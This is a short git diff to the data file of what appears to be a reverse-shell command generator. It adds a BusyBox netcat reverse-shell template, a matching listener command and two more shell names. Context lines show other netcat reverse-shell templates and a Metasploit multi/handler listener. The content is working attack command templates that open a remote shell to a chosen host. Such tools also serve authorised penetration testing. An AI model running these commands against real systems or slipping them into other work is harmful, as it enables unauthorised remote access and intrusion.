diff --git a/js/data.js b/js/data.js index a9cbe52..6f55e3c 100644 --- a/js/data.js +++ b/js/data.js @@ -60,6 +60,11 @@ const reverseShellCommands = withCommandType( "command": "nc.exe {ip} {port} -e {shell}", "meta": ["windows"] }, + { + "name": "BusyBox nc -e", + "command": "busybox nc {ip} {port} -e {shell}", + "meta": ["linux"] + }, { "name": "nc -c", "command": "nc -c {shell} {ip} {port}", @@ -455,6 +460,7 @@ const rsgData = { listenerCommands: [ ['nc', 'nc -lvnp {port}'], + ['busybox nc', 'busybox nc -lp {port}'], ['ncat', 'ncat -lvnp {port}'], ['ncat.exe', 'ncat.exe -lvnp {port}'], ['ncat (TLS)', 'ncat --ssl -lvnp {port}'], @@ -469,7 +475,7 @@ const rsgData = { ['msfconsole', 'msfconsole -q -x "use multi/handler; set payload {payload}; set lhost {ip}; set lport {port}; exploit"'] ], - shells: ['sh', '/bin/sh', 'bash', '/bin/bash', 'cmd', 'powershell', 'pwsh', 'ash', 'bsh', 'csh', 'ksh', 'zsh', 'pdksh', 'tcsh'], + shells: ['sh', '/bin/sh', 'bash', '/bin/bash', 'cmd', 'powershell', 'pwsh', 'ash', 'bsh', 'csh', 'ksh', 'zsh', 'pdksh', 'tcsh', 'mksh', 'dash'], upgrade: ['python', ],